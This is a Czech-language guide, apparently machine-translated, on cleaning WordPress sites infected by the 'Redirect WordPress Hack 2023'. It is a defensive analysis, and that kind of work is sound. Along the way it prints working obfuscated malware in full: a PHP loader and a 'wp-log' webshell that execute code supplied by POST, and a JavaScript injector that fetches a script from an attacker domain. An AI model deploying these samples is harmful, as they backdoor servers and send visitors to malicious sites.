WordPress je to jednoznačně nejpoužívanější platforma CMS (Content Management System) jak pro blogy, tak pro začínající internetové obchody (s modulem WooCommerce), díky čemuž je nejvíce terčem počítačových útoků (hackování). Jedna z nejpoužívanějších hackerských operací má za cíl přesměrovat napadený web na jiné webové stránky. Redirect WordPress Hack 2023 je relativně nový malware, který má za následek přesměrování celého webu na spamové webové stránky nebo může infikovat počítače uživatelů.
Pokud se vaše stránky vyvíjely na WordPress je přesměrován na jiný web, pak je s největší pravděpodobností obětí již známého redirect hacku.
V tomto návodu najdete potřebné informace a užitečné tipy, jak devirovat web infikovaný přesměrováním WordPress Hack (Virus Redirect). Prostřednictvím komentářů můžete získat další informace nebo požádat o pomoc.
Obsah
Detekce viru, který přesměrovává stránky WordPress
Náhlý a neopodstatněný pokles návštěvnosti webu, pokles počtu objednávek (v případě internetových obchodů) nebo příjmů z reklamy jsou prvními signály, že něco není v pořádku. Detekce"Redirect WordPress Hack 2023“ (Virus Redirect) lze také provést „vizuálně“, když otevřete webovou stránku a budete přesměrováni na jinou webovou stránku.
Ze zkušeností vyplývá, že většina webového malwaru je kompatibilní s internetovými prohlížeči: Chrome, Firefox, Edge, Opera. Pokud jste uživatelem počítače Mac, tyto viry nejsou v prohlížeči skutečně vidět Safari. Bezpečnostní systém od Safari tiše blokovat tyto škodlivé skripty.
Co dělat, pokud máte infikovaný web Redirect WordPress Hack
Doufám, že prvním krokem není panikařit nebo web smazat. Ani infikované nebo virové soubory by neměly být zpočátku mazány. Obsahují cenné informace, které vám mohou pomoci pochopit, kde došlo k narušení zabezpečení a co ovlivnilo virus. Modus operandi.
Zavřete web pro veřejnost.
Jak zavřete virový web pro návštěvníky? Nejjednodušší je použít správce DNS a odstranit IP pro "A" (název domény) nebo definovat neexistující IP. Návštěvníci webu tak budou chráněni před tímto přesměrováním WordPress hack, který je může přivést na webové stránky s viry nebo spamem.
Pokud použijete CloudFlare jako správce DNS se přihlásíte k účtu a odstraníte záznamy DNS "A“ pro název domény. Doména zasažená virem tak zůstane bez IP adresy a nebude již přístupná z internetu.
Zkopírujete IP webové stránky a "nasměrujete" ji tak, abyste k ní měli přístup pouze vy. Z vašeho počítače.
Jak změnit skutečnou IP webové stránky na počítačích Windows?
Tato metoda se často používá k blokování přístupu k určitým webovým stránkám úpravou souboru „hosts“.
1. Otevřeš Notepad nebo v jiném textovém editoru (s právy správce) a upravte soubor "hosts". Je umístěn v:
C:\Windows\System32\drivers\etc\hosts
2. V souboru "hosts" přidejte "route" ke skutečné IP vaší webové stránky. IP odstraněna výše ze správce DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld
3. Uložte soubor a přejděte na web v prohlížeči.
Pokud se web neotevře a v souboru „hosts“ jste neudělali nic špatného, jedná se s největší pravděpodobností o mezipaměť DNS.
Vymazání mezipaměti DNS v operačním systému Windows, OTEVŘENO Command Prompt, kde spustíte příkaz:
ipconfig /flushdns
Jak změnit skutečnou IP webové stránky na počítačích Mac / MacRezervovat?
Pro uživatele počítačů Mac je poněkud jednodušší změnit skutečnou IP webové stránky.
1. Otevřete nástroj Terminal.
2. Spusťte příkazový řádek (pro spuštění vyžaduje systémové heslo):
sudo nano /etc/hosts
3. Stejné jako u počítačů Windows, přidejte skutečnou IP domény.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld
4. Uložte změny. Ctrl+X (y)
.
Poté, co jste „nasměrovali“, jste jedinou osobou, která má přístup k infikované webové stránce Redirect WordPress Hack.
Úplná záloha webu – soubory a databáze
I když je infikován „přesměrováním WordPress hack“, doporučuje se provést obecnou zálohu celého webu. Soubory a databáze. Možná byste také mohli uložit místní kopii obou souborů public / public_html
stejně jako databáze.
Identifikace infikovaných souborů a souborů modifikovaných Redirect WordPress Hack 2023
Hlavní cílové soubory WordPress existují index.php
(v kořeni), header.php
, index.php
şi footer.php
tématu WordPress aktiva. Ručně zkontrolujte tyto soubory a identifikujte škodlivý kód nebo malwarový skript.
V roce 2023 se objevil virus typu „Redirect WordPress Hack“vložit index.php
kód formuláře:
(Nedoporučuji spouštět tyto kódy!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>
Dekódováno, tohle škodlivý skript je to v podstatě důsledek napadení webové stránky WordPress. Za malwarem nestojí skript, ale skript, který umožňuje přesměrovat infikovanou webovou stránku. Pokud dekódujeme výše uvedený skript, dostaneme:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Pro identifikaci všech souborů na serveru, které obsahují tento kód, je dobré mít přístup SSH
na server, na kterém spustíte kontrolu souborů a správu příkazových řádků Linux.
Související: Jak zjistit, zda je váš blog infikován nebo ne, s pomocí Google Search , (WordPress Virus)
Níže jsou uvedeny dva příkazy, které jsou určitě užitečné k identifikaci nedávno upravených souborů a souborů, které obsahují určitý kód (řetězec).
Jak to vidíš Linux Změnily se soubory PHP za posledních 24 hodin nebo v jiném časovém rámci?
Objednat "find
” se velmi jednoduše používá a umožňuje přizpůsobení nastavení časového období, cesty k vyhledávání a typu souborů.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"
Ve výstupu obdržíte informace o datu a času změny souboru, oprávnění k zápisu / čtení / spouštění (chmod
) a do které skupiny/uživatele patří.
Pokud chcete zkontrolovat před více dny, změňte hodnotu "-mtime -1
“ nebo použijte „-mmin -360
“ po dobu minut (6 hodin).
Jak hledat kód (řetězec) v souborech PHP, Java?
Příkazový řádek "najít", který vám umožní rychle najít všechny soubory PHP nebo Java, které obsahují určitý kód, je následující:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +
Příkaz vyhledá a zobrazí soubory .php
şi .js
obsahující "uJjBRODYsU
".
Pomocí dvou výše uvedených příkazů velmi snadno zjistíte, které soubory byly v poslední době upraveny a které obsahují malware kód.
Odstraňuje škodlivý kód z upravených souborů, aniž by narušil správný kód. V mém scénáři byl malware umístěn před otevřením <head>
.
Při provádění prvního příkazu "najít" je velmi možné objevit nové soubory na serveru, které nejsou vaše WordPress ani tam dát ty. Soubory patřící k typu viru Redirect WordPress Hack.
Ve scénáři, který jsem zkoumal, soubory formuláře „wp-log-nOXdgD.php
". Jedná se o „spawn“ soubory, které také obsahují malwarový kód používaný virem k přesměrování.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}
Účel souborů typu "wp-log-*
“ je šíření viru přesměrování na další webové stránky hostované na serveru. Jedná se o malwarový kód typu „webshell“ složený z a základní sekce (ve kterém jsou definovány některé šifrované proměnné) a o exekuční sekce prostřednictvím kterého se útočník pokouší načíst a spustit škodlivý kód v systému.
Pokud existuje proměnná POST pojmenovaný 'bh
“ a jeho zašifrovanou hodnotu MD5 je rovný "8f1f964a4b4d8d1ac3f0386693d28d03
“, pak se zdá, že skript zapisuje zašifrovaný obsah base64
další proměnné s názvem 'b3
' v dočasném souboru a poté se pokusí tento dočasný soubor zahrnout.
Pokud existuje proměnná POST nebo GET pojmenovaný 'tick
', skript odpoví hodnotou MD5 řetězce"885
".
Chcete-li identifikovat všechny soubory na serveru, které obsahují tento kód, vyberte řetězec, který je společný, a poté spusťte příkaz „find
“ (podobně jako výše). Smažte všechny soubory obsahující tento malwarový kód.
Bezpečnostní chyba zneužita Redirect WordPress Hack
S největší pravděpodobností tento virus přesměrování přichází přes zneužití administračního uživatele WordPress nebo identifikací a zranitelný plugin který umožňuje přidávat uživatele s oprávněními správce.
Pro většinu webů postavených na platformě WordPress to je možné úpravy souborů motivů nebo pluginůz administračního rozhraní (Dashboard). Osoba se zlými úmysly tak může do souborů motivu přidat malwarový kód a vygenerovat skripty uvedené výše.
Příklad takového malwarového kódu je tento:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>
JavaScript identifikované v záhlaví motivu WordPress, ihned po otevření štítku <head>
.
Je poměrně obtížné tento JavaScript dešifrovat, ale je zřejmé, že se dotazuje na jinou webovou adresu, odkud s největší pravděpodobností stahuje další skripty pro vytváření souborů "wp-log-*
“, o kterém jsem mluvil výše.
Najděte a odstraňte tento kód ze všech souborů PHP postižený.
Pokud jsem mohl říct, tento kód byl ručně přidáno novým uživatelem s administrátorskými právy.
Chcete-li tedy zabránit přidávání malwaru z řídicího panelu, je nejlepší zakázat možnost úprav WordPress Motivy / pluginy z řídicího panelu.
Upravte soubor wp-config.php
a přidejte řádky:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);
Po provedení této změny žádný uživatel WordPress již nebudete moci upravovat soubory z řídicího panelu.
Zkontrolujte uživatele s rolí Administrator
Níže je uveden SQL dotaz, který můžete použít k vyhledání administrátorů na platformě WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'
Tento dotaz vrátí všechny uživatele v tabulce wp_users
kdo přidělil roli správce. Dotaz se provádí také pro tabulku wp_usermeta
hledat v meta 'wp_capabilities
', který obsahuje informace o uživatelských rolích.
Další metodou je identifikovat je z: Dashboard → Users → All Users → Administrator. Existují však postupy, pomocí kterých lze uživatele na panelu Dashboard skrýt. Takže nejlepší způsob, jak vidět uživatele "Administrator"V WordPress je výše uvedený příkaz SQL.
V mém případě jsem v databázi identifikoval uživatele jménem "wp-import-user". Docela sugestivní.
Také zde můžete vidět datum a čas uživatele WordPress byl vytvořen. ID uživatele je také velmi důležité, protože prohledává protokoly serveru. Tímto způsobem můžete vidět veškerou aktivitu tohoto uživatele.
Smazat uživatele s rolí správce což tedy neznáte změnit hesla všem administrativním uživatelům. Redaktor, autor, Administrator.
Změňte heslo uživatele databáze SQL dotčeného webu.
Po provedení těchto kroků lze web restartovat pro všechny uživatele.
Mějte však na paměti, že to, co jsem uvedl výše, je jedním z možná tisíců scénářů, ve kterých je web infikován Redirect WordPress Hack v roce 2023.
Pokud byl váš web infikován a potřebujete pomoc nebo máte nějaké dotazy, sekce komentářů je otevřená.